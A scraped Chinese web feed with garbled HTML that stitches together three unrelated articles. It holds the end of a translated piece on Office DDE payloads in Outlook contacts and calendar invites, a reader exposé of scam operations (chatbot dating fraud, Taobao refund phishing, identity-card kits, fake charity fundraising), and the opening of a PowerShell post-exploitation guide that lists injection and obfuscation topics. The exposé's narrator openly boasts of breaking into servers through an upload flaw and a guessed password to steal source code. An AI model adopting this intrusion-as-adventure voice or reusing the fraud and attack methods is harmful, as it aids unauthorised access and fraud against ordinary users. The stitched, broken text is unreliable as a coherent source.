联系人注释区域的DDE代码执行&/figcaption&&/figure&&p&当用户打开联系人时,将执行嵌入的DDE有效载荷。&/p&&figure&&img src=&https://pic3.zhimg.com/v2-a39a52f4bd2260c9eec19b_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&298& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic3.zhimg.com/v2-a39a52f4bd2260c9eec19b_r.jpg&&&figcaption&Outlook – DDE执行&/figcaption&&/figure&&p&&b&日历邀请&/b&&/p&&p&相同的思路可以适用于通过日历邀请的情况。如果用户与该邀请进行交互(打开或取消),则使用DDE有效载荷发送会议邀请就可以导致代码执行。&/p&&figure&&img src=&https://pic2.zhimg.com/v2-ec028d52efc15bddc26a2c_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&370& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic2.zhimg.com/v2-ec028d52efc15bddc26a2c_r.jpg&&&figcaption&Outlook -通过日历邀请嵌入DDE执行代码&/figcaption&&/figure&&h2&参考&/h2&&ul&&li&&a href=&https://link.zhihu.com/?target=https%3A//medium.com/red-team/dde-payloads-fcd& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&medium.com/red-team/dde&/span&&span class=&invisible&&-payloads-fcd&/span&&span class=&ellipsis&&&/span&&/a&&/li&&li&&a href=&https://link.zhihu.com/?target=http%3A//staaldraad.github.io//msword-field-codes/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&staaldraad.github.io/20&/span&&span class=&invisible&&17/10/23/msword-field-codes/&/span&&span class=&ellipsis&&&/span&&/a&&/li&&li&&a href=&https://link.zhihu.com/?target=http%3A//willgenovese.com/office-ddeauto-attacks/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&willgenovese.com/office&/span&&span class=&invisible&&-ddeauto-attacks/&/span&&span class=&ellipsis&&&/span&&/a&&/li&&li&&a href=&https://link.zhihu.com/?target=https%3A//www.secarma.co.uk/labs/is-dynamic-data-exchange-dde-injection-a-thing/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://www.&/span&&span class=&visible&&secarma.co.uk/labs/is-d&/span&&span class=&invisible&&ynamic-data-exchange-dde-injection-a-thing/&/span&&span class=&ellipsis&&&/span&&/a&&/li&&/ul&&blockquote&本文翻译自:&a href=&https://link.zhihu.com/?target=https%3A//pentestlab.blog//microsoft-office-dde-attacks/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&pentestlab.blog/2018/01&/span&&span class=&invisible&&/16/microsoft-office-dde-attacks/&/span&&span class=&ellipsis&&&/span&&/a& ,如若转载,请注明原文地址: &a href=&https://link.zhihu.com/?target=http%3A//www.4hou.com/technology/9974.html& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&4hou.com/technology/997&/span&&span class=&invisible&&4.html&/span&&span class=&ellipsis&&&/span&&/a& 更多内容请关注“嘶吼专业版”——Pro4hou&/blockquote&
微软的Office是在每个企业或组织中部署的常见应用程序。这种广泛的使用将微软的Office变成了一个可以用来执行攻击并使红队可以收集域哈希或执行任意代码的工具。从历史上看,在微软的Office中执行代码是通过使用宏来执行的。然而,发现了另一种使…
&figure&&img src=&https://pic3.zhimg.com/v2-6c63e163b27902bcaa3c_b.jpg& data-rawwidth=&1280& data-rawheight=&856& class=&origin_image zh-lightbox-thumb& width=&1280& data-original=&https://pic3.zhimg.com/v2-6c63e163b27902bcaa3c_r.jpg&&&/figure&&p&文/读者投稿(微信公众号:一本黑)&br&&/p&&p&责编/振宇、东东&/p&&p&【一本黑】媒体或商业转载必须获得授权,个人转发朋友圈无需授权。&/p&&p&&br&&/p&&p&&br&&/p&&p&当你知道了太多事实,你就会觉得目之所及的各种新闻都是一种虚假说辞,让我意识到一本黑不只要揭黑,更要维护事件的真貌。 &/p&&p&&br&&/p&&p&这次的推文来自一个混迹于黑产圈的读者投稿,谈到的所有内容都真实存在,作者不希望和黑产牵扯太多,所以文字由我稍作调整,用一个合适的角度呈现给大家。&/p&&p&&br&&/p&&p&文中涉及【交友】、【淘宝哥】、【黑卡】、【轻松筹】等四个黑产,其中”轻松筹“是该团伙的原创,而且至今还没有被大规模效仿。&/p&&p&&br&&/p&&p&这里的「交友」黑产此前已经被一本黑爆料过,而「淘宝哥」、「黑卡」和「轻松筹」此前并未在一本黑得到揭露,希望大家可以通篇读完,以防自己落入陷阱。&/p&&p&&br&&/p&&p&&br&&/p&&blockquote&&b&「交友黑产」&/b&&/blockquote&&p&&br&&/p&&p&故事始于16年的一个下雨天,我接到朋友的电话,朋友说“Am,现在有人给我介绍了个项目,据说一个微信号日产200!”&/p&&p&&br&&/p&&p&我瞬间就楞了,“日产200?骗人的吧!有这好事还轮的到你?”。&/p&&p&&br&&/p&&p&朋友认真地告诉我是真的,他们的工作室有几千台设备,日收入一直保持在几十万。&/p&&p&&br&&/p&&p&其实就是打着交友的旗号,用机器人和对方玩文字暧昧。&/p&&p&&br&&/p&&p&默认回几句就要求对方充值,除此之外,多人聊天、查看微信号、电话等信息也必须要花钱开通VIP,还为了打消对方顾虑说送100元话费,本质上就是诱惑用户充值,空手套白狼!&/p&&p&&br&&/p&&p&他接着说“这是在公众号上运营的,公众号需要开通微信支付,用群控操纵女微信号发朋友圈,一天站街5次,不需要加人就是为了展示给男性用户看,这些通过群控就可以完成。”&/p&&figure&&img src=&https://pic2.zhimg.com/v2-ca8f487e2baee37c5096_b.jpg& data-size=&normal& data-rawwidth=&348& data-rawheight=&620& class=&content_image& width=&348&&&figcaption&(图片来源于网络)&/figcaption&&/figure&&p&(
站街是一种营销手段,主要是利用社交软件附近的人功能,用站点的方式来曝光自己。在附近的人功能里面让自己被别人搜到,就能让人看到你打的广告,从而进行推广。这个方法在QQ作为主流IM工具的时候就已经出现。)&/p&&p&&br&&/p&&p&电话里不方便聊太多,我们晚上专门找了个地方边喝酒边谈。&/p&&p&&br&&/p&&p&酒桌上朋友拿着手机给我展示着所谓的 “同城交友”。&/p&&figure&&img src=&https://pic2.zhimg.com/v2-379eadf34a_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&720& data-rawheight=&1237& class=&origin_image zh-lightbox-thumb& width=&720& data-original=&https://pic2.zhimg.com/v2-379eadf34a_r.jpg&&&/figure&&p&&br&&/p&&p&既要赚足男性眼球,又不想冒涉黄的风险,他们在图片的选择上下了不少功夫。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-fe567e59d19f15e802a7c0b_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&720& data-rawheight=&1235& class=&origin_image zh-lightbox-thumb& width=&720& data-original=&https://pic1.zhimg.com/v2-fe567e59d19f15e802a7c0b_r.jpg&&&/figure&&p&尽管运作模式粗放甚至漏洞百出,但是依然可以促使不少的男性付费。&/p&&p&&br&&/p&&p&虽然看起来不可思议,但是色流一直是互联网的一股庞大的暗黑流量,只要和色沾边的内容总能享受到流量上的优待。&/p&&p&&br&&/p&&p&世界最大的成人网站可以在alexa流量排行榜上一直保持在前三十名,播放量常年在50亿左右,所以色流的力量不容小觑。&/p&&figure&&img src=&https://pic2.zhimg.com/v2-0b29e3e6ae2acbfc0576e8c_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&640& data-rawheight=&129& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&https://pic2.zhimg.com/v2-0b29e3e6ae2acbfc0576e8c_r.jpg&&&/figure&&p&既然话已至此,我直接问他“你告诉我这些,是打算让我帮你什么?”朋友告诉我,他现在只是个代理,上家(运营者)会抽走4成的利润,所以想拿了源码单干。&/p&&p&&br&&/p&&p&言外之意,就是想让我从服务器里把源码拖出来。(用老师傅的话来说:“搞定了服务器,你就可以为所欲为”)&/p&&p&&br&&/p&&p&他留下网址和后台账号,回去等我的消息。&/p&&p&&br&&/p&&p&&b&「交友黑产」之盗取源码&/b&&/p&&p&&br&&/p&&p&其实那时我也并没有十分的把握,毕竟技术上的东西现在很少碰了,内心既担心技艺生疏又怀着一种重出江湖的兴奋。&/p&&p&&br&&/p&&p&时间随着键盘的敲击声慢慢流逝,经过多种尝试,终于在上传头像的功能里找到了一个开发者没有留意的漏洞,这个漏洞不止让我拿下了网站拖出源码,同时,让我在数据库里看到了令人吃惊的数据。&/p&&p&&br&&/p&&p&&b&日注册用户有7万多人,付费率高达将近80%!&/b&&/p&&p&&br&&/p&&p&总后台可以看到机器人的设置,里面都是设置好的文本发送还有关键词回复,因为关键词回复工程量太大,只能设置一些通用的关键词,所以说不了两句就要求充值。(由于时间久远,数据的图片已经找不到了。)&/p&&p&&br&&/p&&p&照片和语音都有专门的文件夹,头像和照片都是套图,这些可怜的男同胞花了钱其实也只是在和代码聊天。&/p&&p&&br&&/p&&p&我将源码打包发给了他,并约他第二天见面。&/p&&p&&br&&/p&&p&&b&「交友黑产」之走访工作室&/b&&/p&&p&&br&&/p&&p&第二天见面后我提出“能带我去做这个项目的工作室参观一下吗?我想看看有多少台设备。”&/p&&p&&br&&/p&&p&朋友没有拒绝,但是提醒我隐藏身份,假装成也想做这个项目的人。&/p&&p&&br&&/p&&p&路上我随口问了一句“是不是有几百台设备在跑?”这次他的回答让我彻底奔溃了,“几百台?&b&做这个项目已经不按台算了,按楼层来算!我们有2层!”&/b&&/p&&p&&br&&/p&&p&来到工作室我才明白,这里和网上所看到的图片根本不能相提并论,一排排设备挂满了所有的架子。房间里48口充电器的散热风扇发出恼人的轰鸣声,其间还夹杂着每次持续几秒钟的叮咚声。&/p&&figure&&img src=&https://pic2.zhimg.com/v2-2a9edfd462_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&720& data-rawheight=&1183& class=&origin_image zh-lightbox-thumb& width=&720& data-original=&https://pic2.zhimg.com/v2-2a9edfd462_r.jpg&&&/figure&&p&为了不引起怀疑,照片没敢多拍。&/p&&p&那天的心情已经无法用语言来形容,何况这种规模的工作室还不止一家。&/p&&figure&&img src=&https://pic3.zhimg.com/v2-f9cddee109_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&720& data-rawheight=&540& class=&origin_image zh-lightbox-thumb& width=&720& data-original=&https://pic3.zhimg.com/v2-f9cddee109_r.jpg&&&/figure&&p&当时心里百感交集,做什么毛生意不如买几十台设备做这项目,一个月能顶得上我一年的收入了。&/p&&p&&br&&/p&&p&从工作室出来,我压抑不住好奇,追问他这个项目是从何流出的?如此赚钱的门道谁又会到处宣扬?&/p&&p&&br&&/p&&p&然而,与其说他给了我一个答案,不如说他的回答又给我打开了一扇门,一扇关于&b&电信诈骗,买卖数据,制作黑卡的大门…&/b&&/p&&p&&br&&/p&&blockquote&&b&「全镇武装的“淘宝哥”诈骗黑产」&/b&&/blockquote&&p&&br&&/p&&p&“这个思路是XX市的「淘宝哥」传出来的!他们中有人转型做交友,买设备的时候走漏了这个项目的模式。”&/p&&p&&br&&/p&&p&我继续追问他“淘宝哥是什么?是开淘宝店的吗?”&/p&&p&&br&&/p&&p&朋友深吸一口气“&b&淘宝哥就是通过某些渠道买到淘宝客户数据的人,这些数据精确到消费时间、地址、姓名、电话。拿到数据之后,会开始对目标进行诈骗。”&/b&&/p&&p&&br&&/p&&p&“首先,淘宝哥(骗子)会打电话给目标,自称是网店的客服人员,通知你因为淘宝网支付系统出了点问题,目前该笔交易资金已经被冻结,希望你申请退款,退款成功后再重新交易。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-67e823bc480cca4b990bc_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&640& data-rawheight=&299& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&https://pic1.zhimg.com/v2-67e823bc480cca4b990bc_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-ee79a3cb819eaefa519540d_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&640& data-rawheight=&299& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&https://pic3.zhimg.com/v2-ee79a3cb819eaefa519540d_r.jpg&&&/figure&&p&&br&&/p&&p&期间他们会不断使用话术博取你的信任。&/p&&p&&br&&/p&&p&之后,让你加客服QQ并且给你发送钓鱼网址让你申请退款。&/p&&p&&br&&/p&&p&电话里他们不停地对目标洗脑,诱导你把手机号和验证码都填进去。&/p&&p&&br&&/p&&p&在你点击确认退款后,骗子就得到了你输入的所有信息!”&/p&&figure&&img src=&https://pic2.zhimg.com/v2-05fa92019d7febc908c60fc_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&640& data-rawheight=&308& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&https://pic2.zhimg.com/v2-05fa92019d7febc908c60fc_r.jpg&&&/figure&&p&听到这些我内心一直无法平复,“这些人就不怕再出一次“徐玉玉”事件吗?”&/p&&p&&br&&/p&&p&朋友一遍点着烟一遍跟我讲,“任何行业都有自己的准则,就算是黑产也是盗亦有道。&/p&&p&&br&&/p&&p&淘宝哥的准则就是不对学生下手,假如事后才知道,也会把钱还给他们。&/p&&p&&br&&/p&&p&有时碰到真的家里困难的,面对学生的哀求,淘宝哥还可能多退几千回去,毕竟都是穷人出身,都明白个中的辛酸。&/p&&p&&br&&/p&&p&当然,个别不守原则的人就另当别论。”&/p&&p&&br&&/p&&p&这时我想的是这TM的做诈骗还分有没有原则?&/p&&p&&br&&/p&&p&朋友叹着气告诉我“大多数淘宝哥会告诉自己,即便我不骗他,也有人会去骗。&/p&&p&&br&&/p&&p&平时可能还会去烧香拜佛,做这些都是为了让自己内心舒服点。”&/p&&p&&br&&/p&&p&“这些数据是怎么来的,是不是商家自己出售客户的信息?”。&/p&&p&&br&&/p&&p&他冷笑了一声:“&b&这些数据也是一条黑色产业链,批发这些数据的boss会把自己的小弟安插在快递公司,淘宝商家里头上班。&/b&&/p&&p&&br&&/p&&p&“更厉害的人会绕过360等主流杀毒软件,把木马发给淘宝商家的客服,从他们电脑上窃取数据。&/p&&p&&br&&/p&&p&&b&“除此以外,可能还有一些阿里的内部人员会把这些数据提供给一些商家,这些商家用完再出售一遍,拿到这些数据的二手贩子再把数据出售给诈骗团伙。”&/b&&/p&&figure&&img src=&https://pic1.zhimg.com/v2-432cb1edb3bbcda8c16c67d2e8240817_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&478& data-rawheight=&246& class=&origin_image zh-lightbox-thumb& width=&478& data-original=&https://pic1.zhimg.com/v2-432cb1edb3bbcda8c16c67d2e8240817_r.jpg&&&/figure&&p&“我们那有一个镇子,里面的年轻人基本都在山上做这个。遇到有外人去他们那里,村民都会问他们过来做什么的。如果发现不对劲会马上散出消息保护淘宝哥全身而退,还有的人会雇佣一些镇上的人在各个地方当眼线。”&/p&&p&&br&&/p&&p&当时我就像是小孩听大人讲故事一样听着。没想到这诈骗的团队已经庞大到了一个镇,而且还有村民、眼线帮他们当哨兵。&/p&&p&&br&&/p&&p&从窃取数据到诈骗,整条产业链分工是多么的明确。&/p&&p&&br&&/p&&p&打听了一下,运气好的淘宝哥日产能有几十万,保守计算,一个团伙月收上亿不是问题。&/p&&p&&br&&/p&&p&据我所知,为了应对执法打击,淘宝哥的诈骗套路也在不断更新。&/p&&p&&br&&/p&&p&诈骗的法律风险还是太高,很多人开始调整方向,前文提到的「交友」就因此而生。&/p&&p&&br&&/p&&p&&br&&/p&&p&&br&&/p&&blockquote&&b&「黑卡」黑产的必备工具&/b&&/blockquote&&p&&br&&/p&&p&这就让我想到一个新问题,「交友」早期是在公众号运营,现在转向app,但是这些都是需要开通微信支付或者支付宝支付的,他们肯定不会用自己真实的公司去申请。&/p&&p&&br&&/p&&p&那么黑产就需要大量的工商注册信息。&/p&&p&&br&&/p&&p&这里用到的工具就是黑产的必备工具——黑卡。黑卡与绝大多数的黑产紧密相连,可以说是黑产的最重要环节!&/p&&p&&br&&/p&&p&这里的黑卡不是那种土豪专属的银行黑卡,而是黑产收钱用的黑卡!&/p&&p&&br&&/p&&p&&b&黑卡一般是以套为单位出现,包含身份证,银行卡,手机卡,U盾,被称为四大件。&/b&&/p&&p&&br&&/p&&p&黑产团伙就是拿着这四大件去办理个体商业户,成本不等,再用商户资料去开通公众号的微信支付。&/p&&p&&br&&/p&&p&这里面的银行卡和电话卡也都是淘宝哥常用的作案工具,确保不会留下和自己有关的痕迹。&/p&&p&&br&&/p&&p&黑产对黑卡的需求量很大,手握几百套黑卡是业界平均水平。&/p&&p&&br&&/p&&p&通过几个黑市卖家,我了解到了黑卡的来源。&/p&&p&&br&&/p&&p&以前,银行还没有人脸识别系统,黑产会专门找人出去收身份证,然后让长得像的人去办卡。&/p&&p&&br&&/p&&p&但是现在银行启用了人脸识别,所以黑产也换了方法。&/p&&p&&br&&/p&&p&他们专门在类似网吧这样的场所,寻找不务正业游手好闲的年轻人(其中还有吸毒者),然后支付100-300元的报酬让他们去办卡,这些卡就是日后黑产用的黑卡。&/p&&p&&br&&/p&&p&那些好吃懒做拿着钱就跑去上网,不然就是有染上毒瘾的人,这类群体为了钱什么都敢做。&/p&&p&&br&&/p&&p&&br&&/p&&p&&br&&/p&&blockquote&&b&「市场风云变化,黑产手法也不断升级」&/b&&/blockquote&&p&&br&&/p&&p&正邪一直在相互抗衡,市场也在不断变化。&/p&&p&&br&&/p&&p&&b&腾讯封杀交友类的公众号,黑卡也被打压了&/b&,但是道高一尺,魔高一丈,交友从公众号转型为APP,而黑卡也从身份证原件变为了复印件。&/p&&p&&br&&/p&&p&如今网络安全逐步升级,钓鱼网站逐渐没落。&/p&&p&&br&&/p&&p&现在,淘宝哥很少以“支付系统出问题”做理由,而是用“产品质量有问题可能引起过敏”等做为理由,告知受害者需要退款,然后借机&b&询问芝麻信用的分数,如果符合条件就开始诱导受害者开通借呗,网商贷,招联好期贷等借款服务。&/b&&/p&&p&&br&&/p&&p&再告诉受害者钱已经退到这里面,让用户去注册查看,不知情的用户看见里面居然有上万元也很吃惊。&/p&&p&&br&&/p&&p&然而“客服”却可怜巴巴的说是退款退错了,希望你能扣除原有的商品价格将剩余的还给他。&/p&&p&&br&&/p&&p&善良的受害者如同淘宝哥手上的玩物,被耍的团团转。&/p&&p&&br&&/p&&p&数日之后,当受害者收到催款短信方才如梦初醒。&/p&&p&&br&&/p&&p&此时的我已经觉得自己看待事物的方式大有变化,混入了黑产界的“江湖”,假装自己是个小白获取小道消息,慢慢让我成为了黑产界的百晓生。&/p&&p&&br&&/p&&p&然而,过了一年我再次发现一个更为黑暗的产业。。。&/p&&p&&br&&/p&&p&&br&&/p&&p&&br&&/p&&blockquote&&b&「轻松筹,到底是轻松筹还是 “轻松”筹?」&/b&&/blockquote&&p&&br&&/p&&p&时正三月,刚好点开了家人发的一条轻松筹筹款的朋友圈。
&/p&&figure&&img src=&https://pic2.zhimg.com/v2-ae96781530_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&413& data-rawheight=&736& class=&content_image& width=&413&&&/figure&&p&正要给癌症小孩捐款,突然发现收款方居然不是轻松筹的官方名称,而一个和官方商户名称相近的名字。&/p&&p&&br&&/p&&p&这让我产生了怀疑,首页没什么疑点,可疑的是点击其他按钮的时候居然没反应。&/p&&p&&br&&/p&&p&当我观察了网址方才发现域名并不是官方的域名,让我断定这就是假的轻松筹!&/p&&p&&br&&/p&&p&为求真相,我开始对目标进行探究。&/p&&p&&br&&/p&&p&我利用计算机基础知识对该网址进行了分析,试了很多种常用的方法都是以失败告终。&/p&&p&&br&&/p&&p&无奈之下,居然想出了一个成功率连1%都不到的方法。&/p&&p&&br&&/p&&p&然而一切因此柳暗花明,我追踪到一个香港的IP,而服务器端口的密码被我用QAZxsw连进去了!&/p&&p&&br&&/p&&p&最终我在后台看到了真相。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-9f2d21f4acaae5bb28a29c89effc047b_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&640& data-rawheight=&456& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&https://pic1.zhimg.com/v2-9f2d21f4acaae5bb28a29c89effc047b_r.jpg&&&/figure&&p&&br&&/p&&p&果然所有的数据都是假的。&/p&&p&&br&&/p&&p&对方很是谨慎,完成一个项目就立刻删除,所有的资金都流入公众号的支付平台内,外界无从得知他们究竟“筹”到了多少钱,不知道各位读者里可有人上过当。&/p&&p&&br&&/p&&p&到此就告一段落了,可能大家觉得我没有及时发布而且有部分图片也没有,因为过去那么久所留下的图片也是找了好久才找到的,而且我最近才知道有一本黑。&/p&&p&&br&&/p&&p&现在告诉你们应该也不迟,如果你们觉得有用的话,后续我会继续公布一些黑产界不为人知的秘密,也请各位读者能将这些危害社会的手段告知给身边的人,文笔拙劣,各位见笑。&/p&&p&&br&&/p&&p&最后,谢谢一本黑给我机会能把这些藏在心里的秘密大白天下。&/p&&p&&br&&/p&&p&振宇:志同道合,何需言谢。&/p&
文/读者投稿(微信公众号:一本黑) 责编/振宇、东东【一本黑】媒体或商业转载必须获得授权,个人转发朋友圈无需授权。 当你知道了太多事实,你就会觉得目之所及的各种新闻都是一种虚假说辞,让我意识到一本黑不只要揭黑,更要维护事件的真貌。 这次的推文…
&figure&&img src=&https://pic3.zhimg.com/v2-ffcff098dda20_b.jpg& data-rawwidth=&1024& data-rawheight=&616& class=&origin_image zh-lightbox-thumb& width=&1024& data-original=&https://pic3.zhimg.com/v2-ffcff098dda20_r.jpg&&&/figure&&p&作者:香山&/p&&p&预估稿费:800RMB&/p&&p&&b&(本篇文章享受双倍稿费 活动链接请&a href=&http://link.zhihu.com/?target=http%3A//bobao.360.cn/news/detail/4370.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&点击此处&/a&)&/b&&/p&&p&投稿方式:发送邮件至linwei#&a href=&http://link.zhihu.com/?target=http%3A//360.cn& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&360.cn&/span&&span class=&invisible&&&/span&&/a&,或登陆网页版在线投稿&/p&&p&&br&&/p&&p&&b&此为Powershell攻击指南——黑客后渗透之道系列的第一篇基础篇。此后每两天更新一篇,敬请期待!&/b&&/p&&p&&br&&/p&&h2&前言&/h2&&blockquote&一段时间以来研究Powershell,后来应朋友们对Powershell的需求,让我写一个Powershell安全入门或者介绍方面的文章,所以这篇文章就出现了。但又因为各种各样的事情搞得有些拖延,同时作者文笔不好,文章可能有不流畅的地方,还请多多见谅。这里做一些总结,来让新人对此有个大致了解,能对Powershell或是内网有更多的理解。开始之前也要感谢红线安全团队的资深安全专家&a href=&http://link.zhihu.com/?target=http%3A//triplekill.org/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&@城哥&/a&和朋友&a href=&http://link.zhihu.com/?target=http%3A//blog.exist1ng.com/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&x403258&/a&在我写文过程中的帮助。&br&那么开始之前我们先来思考一下powershell一个常见的问题,那么我们知道powershell的后缀是ps1,哪为什么是ps1而不是ps2,ps3呢?那么理解这个问题呢我们可以看看powershell的特性,powershell是对下完全兼容的,也就是说你使用powershell 5.x的版本来执行powershell v1.0的代码也是完全没有问题的。那么我个人理解一下为什么是ps1,可以这么说,当我们见到ps2后缀之时就是powershell进行大的更新,也就是不对下兼容的时候,所以这里一直是使用ps1后缀。&br&那么对于我们的安全人员来说我们用什么版本呢?毫无疑问是v2,为什么呢,应为在win7当中默认安装了v2,而且之后的版本都是兼容v2的,v1版本所有的功能对于我们的需求很多都不能满足,所以v2成为了我们目前来说独一无二的选择,通过下面的方式我们可以看到我们的powershell的版本与一些详细的信息,后面我们的代码,大多都是以v2.0来讨论的。&/blockquote&&p&&code&Get-Host&/code&&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&Name
: ConsoleHost
InstanceId
: -35cd-4bba-bedb-cf00d2a39389
: System.Management.Automation.Internal.Host.InternalHostUserInterface
CurrentCulture
CurrentUICulture : en-US
PrivateData
: Microsoft.PowerShell.ConsoleHost+ConsoleColorProxy
IsRunspacePushed : False
: System.Management.Automation.Runspaces.LocalRunspace
&/code&&/pre&&/div&&p&对于安全人员学习ps主要有以下两个场景:&/p&&ol&&li&第一种我们需要获得免杀或者更好的隐蔽攻击对方的win机器,可以通过钓鱼等方式直接执行命令&/li&&li&第二种我们已经到了对方网络,再不济也是一台DMZ的win-server,那么我们利用ps做的事情那么自然而然的是对内网继续深入&/li&&/ol&&p&那么本powershell系列主要是内容涉及和安全测试相关的内容,所以面向的读者主要是安全或者运维人员,不管你是在网络世界中扮演什么角色,在这里应该是能收获到你想要的。文章主要包含下面一些内容:&/p&&ol&&li&powershell基础语法&/li&&li&powershell脚本编写与调用执行&/li&&li&powershell的Socket编程&/li&&li&powershell端口扫描与服务爆破&/li&&li&powershell多线程&/li&&li&powershell操作wmi&/li&&li&powershell操作win32API&/li&&li&powershell操作Dll注入&shellcode注入&exe注入&/li&&li&powershell混淆&/li&&li&powershell事件日志&/li&&li&powershell实例使用场景&/li&&li&Powershell渗透工具集&/li&&/ol&&h2&powershell(2)-基础&/h2&&blockquote&本节主要讲一下关于powershell一些简单的基础知识,推荐网站&a href=&http://link.zhihu.com/?target=http%3A//www.pstips.net/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&pstips.net/&/span&&span class=&invisible&&&/span&&/a&学习Powershell的一些基础知识这里是一些简单的基础,写的可能有些简陋,这里可能需要你有一些编程语言的基础就能看懂啦,这里对于后面的代码分析是非常有用的,所以还是希望大家简单的浏览一下基础知识。&/blockquote&&h2&变量&/h2&&p&变量都是以&code&$&/code&开头, 是强类型语言, 语言是大小写不敏感的&/p&&p&提一提变量保护与常量的声明:&code&New-Variable num -Value 100 -Force -Option readonly&/code&这样就得到一个受保护的变量&code&$num&/code&,如果要销毁它只能通过&code&del $num&/code&删除。如果要声明常量则用&code&New-Variable num -Value 100 -Force -Option readonlyNew-Variable num -Value 100 -Force -Option constant&/code&&/p&&h2&数组&/h2&&h2&数组的创建:&/h2&&p&数组的创建可以通过下面五种方式来创建,在适当的条件下选择适当的方式创建即可&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&$array = 1,2,3,4
$array = 1..4
$array=1,&2017&,([System.Guid]::NewGuid()),(get-date)
$a=,&1& # 一个元素的数组
&/code&&/pre&&/div&&h2&数组的访问&/h2&&p&数组的访问和C类似,第一位元素实用下标0来访问即&code&$array[0]&/code&,我们来看看ipconfig获取到的数据&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&$ip = ipconfig
$ip[1] # 获取ipconfig第二行的数据
&/code&&/pre&&/div&&h2&数组的判断&/h2&&p&&code&$test -is [array]&/code&&/p&&h2&数组的追加:&/h2&&p&&code&$books += &元素4&&/code&&/p&&h2&哈希表&/h2&&h2&哈希表的创建:&/h2&&p&&code&$stu=@{ Name = &test&;Age=&12&;sex=&man& }&/code&&/p&&h2&哈希表里存数组:&/h2&&p&&code&$stu=@{ Name = &hei&;Age=&12&;sex=&man&;Books=&kali&,&sqlmap&,&powershell& }&/code&&/p&&h2&哈希表的插入与删除:&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&$Student=@{}
$Student.Name=&hahaha&
$stu.Remove(&Name&)
&/code&&/pre&&/div&&h2&对象&/h2&&p&在powershell中一切都可以视为对象,包罗万象New-Object可以创建一个对象Add-Member可以添加属性和方法&/p&&h2&控制语句&/h2&&h2&条件判断&/h2&&h2&比较运算符&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&-eq :等于
-ne :不等于
-gt :大于
-ge :大于等于
-lt :小于
-le :小于等于
-contains :包含
$array -contains something
-notcontains :不包含
!($a): 求反
-xor :异或
&/code&&/pre&&/div&&h2&if-else&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&if-else:
if($value -eq 1){
&/code&&/pre&&/div&&h2&循环语句&/h2&&h2&while&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&while($n -gt 0){
&/code&&/pre&&/div&&h2&for&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&$sum=0
for($i=1;$i -le 100;$i++)
&/code&&/pre&&/div&&h2&foreach&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&# 打印出windows目录下大于1mb的文件名
foreach($file in dir c:windows)
if($file.Length -gt 1mb)
$File.Name
&/code&&/pre&&/div&&h2&foreach-object&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&# 获取所有的服务,并获取对呀进程ID是否大于100
Get-WmiObject Win32_Service | ForEach-Object {&Name:&+ $_.DisplayName, &, Is ProcessId more than 100:& + ($_.ProcessId -gt 100)}
&/code&&/pre&&/div&&h2&函数&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&function Invoke-PortScan {
.DESCRIPTION
.PARAMETER StartAddress
.PARAMETER EndAddress
PS & Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254
&/code&&/pre&&/div&&h2&异常处理&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&Try{
$connection.open()
$success = $true
$success = $false
